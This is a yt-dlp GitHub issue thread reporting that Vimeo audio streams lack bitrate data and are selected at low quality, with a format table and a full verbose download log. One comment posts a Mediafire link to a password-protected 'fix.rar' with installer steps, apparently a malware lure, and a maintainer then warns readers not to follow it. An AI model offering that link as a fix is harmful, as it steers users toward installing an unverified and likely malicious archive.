### ISSUE TITLE
Vimeo audio streams not sorted by quality

### ISSUE THREAD

**Issue by benfishbus** [yt-dlp/yt-dlp#10854]
### DO NOT REMOVE OR SKIP THE ISSUE TEMPLATE

- [X] I understand that I will be **blocked** if I *intentionally* remove or skip any mandatory\* field

### Checklist

- [X] I'm reporting that yt-dlp is broken on a **supported** site
- [X] I've verified that I have **updated yt-dlp to nightly or master** ([update instructions](https://github.com/yt-dlp/yt-dlp#update-channels))
- [X] I've checked that all provided URLs are playable in a browser with the same IP and same login details
- [X] I've checked that all URLs and arguments with special characters are [properly quoted or escaped](https://github.com/yt-dlp/yt-dlp/wiki/FAQ#video-url-contains-an-ampersand--and-im-getting-some-strange-output-1-2839-or-v-is-not-recognized-as-an-internal-or-external-command)
- [X] I've searched [known issues](https://github.com/yt-dlp/yt-dlp/issues/3766) and the [bugtracker](https://github.com/yt-dlp/yt-dlp/issues?q=) for similar issues **including closed ones**. DO NOT post duplicates
- [X] I've read the [guidelines for opening an issue](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#opening-an-issue)
- [X] I've read about [sharing account credentials](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#are-you-willing-to-share-account-details-if-needed) and I'm willing to share it if required

### Region

United States

### Provide a description that is worded well enough to be understood

The bitrate of Vimeo audio streams is often not extracted/parsed by yt-dlp, making the selection of "best audio" unreliable. Audio stream IDs typically include the term "-audio-high-" or "-audio-low-", providing an alternative indicator of which streams contain higher or lower bitrate audio.

I've provided output for [this movie trailer](https://vimeo.com/173487055).

The following audio streams are offered for this video:

```
[info] Available formats for 173487055:
ID                                              EXT RESOLUTION FPS │  FILESIZE   TBR PROTO │ VCODEC        VBR ACODEC     MORE INFO
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
hls-akfire_interconnect_quic-audio-high-English mp4 audio only     │                 m3u8  │ audio only        unknown    [en] English
hls-akfire_interconnect_quic-audio-low-English  mp4 audio only     │                 m3u8  │ audio only        unknown    [en] English
hls-fastly_skyfire-audio-high-English           mp4 audio only     │                 m3u8  │ audio only        unknown    [en] English
hls-fastly_skyfire-audio-low-English            mp4 audio only     │                 m3u8  │ audio only        unknown    [en] English
```

- yt-dlp default audio stream ID: `hls-fastly_skyfire-audio-low-English` (128 kbps AAC)
- Best quality audio stream ID: `hls-fastly_skyfire-audio-high-English` (256 kbps AAC)

Expected behavior is the Vimeo extractor identifies audio streams' codec and bitrate, allowing them to be sorted and selected by quality using standard logic. If that is not possible for Vimeo, then alternatively the extractor could prioritize stream IDs containing `-audio-high-` over those containing `-audio-low-`.

### Provide verbose output that clearly demonstrates the problem

- [X] Run **your** yt-dlp command with **-vU** flag added (`yt-dlp -vU <your command line>`)
- [ ] If using API, add `'verbose': True` to `YoutubeDL` params instead
- [X] Copy the WHOLE output (starting with `[debug] Command-line config`) and insert it below

### Complete Verbose Output

```shell
[debug] Command-line config: ['-vU', '--ignore-config', 'https://vimeo.com/173487055']
[debug] Encodings: locale cp1252, fs utf-8, pref cp1252, out utf-8, error utf-8, screen utf-8
[debug] yt-dlp version nightly@2024.08.21.232751 from yt-dlp/yt-dlp-nightly-builds [6f9e65374] (win_exe)
[debug] Python 3.8.10 (CPython AMD64 64bit) - Windows-10-10.0.22621-SP0 (OpenSSL 1.1.1k  25 Mar 2021)
[debug] exe versions: ffmpeg n7.0.2-6-g7e69129d2f-20240825 (setts), ffprobe n7.0.2-6-g7e69129d2f-20240825, rtmpdump 2.3
[debug] Optional libraries: Cryptodome-3.20.0, brotli-1.1.0, certifi-2024.07.04, curl_cffi-0.5.10, mutagen-1.47.0, requests-2.32.3, sqlite3-3.35.5, urllib3-2.2.2, websockets-13.0
[debug] Proxy map: {}
[debug] Request Handlers: urllib, requests, websockets, curl_cffi
[debug] Loaded 1830 extractors
[debug] Fetching release info: https://api.github.com/repos/yt-dlp/yt-dlp-nightly-builds/releases/latest
Latest version: nightly@2024.08.21.232751 from yt-dlp/yt-dlp-nightly-builds
yt-dlp is up to date (nightly@2024.08.21.232751 from yt-dlp/yt-dlp-nightly-builds)
[vimeo] Extracting URL: https://vimeo.com/173487055
[vimeo] 173487055: Downloading webpage
[vimeo] 173487055: Downloading viewer info
[vimeo] 173487055: Downloading API JSON
[vimeo] 173487055: Downloading API JSON
[vimeo] 173487055: Downloading JSON metadata
[vimeo] 173487055: Downloading akfire_interconnect_quic m3u8 information
[vimeo] 173487055: Downloading fastly_skyfire m3u8 information
[vimeo] 173487055: Downloading akfire_interconnect_quic MPD information
WARNING: [vimeo] 173487055: Failed to parse XML: not well-formed (invalid token): line 1, column 0
[vimeo] 173487055: Downloading fastly_skyfire MPD information
WARNING: [vimeo] 173487055: Failed to parse XML: not well-formed (invalid token): line 1, column 0
[debug] Sort order given by extractor: quality, res, fps, hdr:12, source
[debug] Formats sorted by: hasvid, ie_pref, quality, res, fps, hdr:12(7), source, lang, vcodec:vp9.2(10), channels, acodec, size, br, asr, proto, vext, aext, hasaud, id
[debug] Default format spec: bestvideo*+bestaudio/best
[info] 173487055: Downloading 1 format(s): hls-fastly_skyfire-4042+hls-fastly_skyfire-audio-low-English
[debug] Invoking hlsnative downloader on "https://skyfire.vimeocdn.com/1724690670-0x91aea631fb644f28e72c847e6025069d8457fe4d/6e530122-9b7b-43af-beb1-1e4bb75df60f/v2/playlist/av/6e530122/avf/ed33e785/media.m3u8?pathsig=8c953e4f~Svj2dAIn0nqiQQ113Rz_c1B4RB0IL0fzIcxHtZX12zE&sf=ts&st=video"
[hlsnative] Downloading m3u8 manifest
[hlsnative] Total fragments: 22
[download] Destination: MAKE ｜ Official Trailer [173487055].fhls-fastly_skyfire-4042.mp4
[debug] File locking is not supported. Proceeding without locking
[download] 100% of   61.32MiB in 00:00:55 at 1.11MiB/s
[debug] Invoking hlsnative downloader on "https://skyfire.vimeocdn.com/1724690670-0x91aea631fb644f28e72c847e6025069d8457fe4d/6e530122-9b7b-43af-beb1-1e4bb75df60f/v2/playlist/av/6e530122/avf/85e23b6b/media.m3u8?pathsig=8c953e4f~VywAQm3UoX_tAkI2Fwrum7kz6yZR0ragslh6htO4beQ&sf=ts&st=audio"
[hlsnative] Downloading m3u8 manifest
[hlsnative] Total fragments: 22
[download] Destination: MAKE ｜ Official Trailer [173487055].fhls-fastly_skyfire-audio-low-English.mp4
[download] 100% of    2.09MiB in 00:00:28 at 75.76KiB/s
[debug] ffmpeg command line: ffprobe -show_streams "file:MAKE ｜ Official Trailer [173487055].fhls-fastly_skyfire-audio-low-English.mp4"
[Merger] Merging formats into "MAKE ｜ Official Trailer [173487055].mp4"
[debug] ffmpeg command line: ffmpeg -y -loglevel repeat+info -i "file:MAKE ｜ Official Trailer [173487055].fhls-fastly_skyfire-4042.mp4" -i "file:MAKE ｜ Official Trailer [173487055].fhls-fastly_skyfire-audio-low-English.mp4" -c copy -map 0:v:0 -map 1:a:0 -bsf:a:0 aac_adtstoasc -movflags +faststart "file:MAKE ｜ Official Trailer [173487055].temp.mp4"
Deleting original file MAKE ｜ Official Trailer [173487055].fhls-fastly_skyfire-4042.mp4 (pass -k to keep)
Deleting original file MAKE ｜ Official Trailer [173487055].fhls-fastly_skyfire-audio-low-English.mp4 (pass -k to keep)
```

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bashonly** [comment]
Do not follow the link posted above this comment
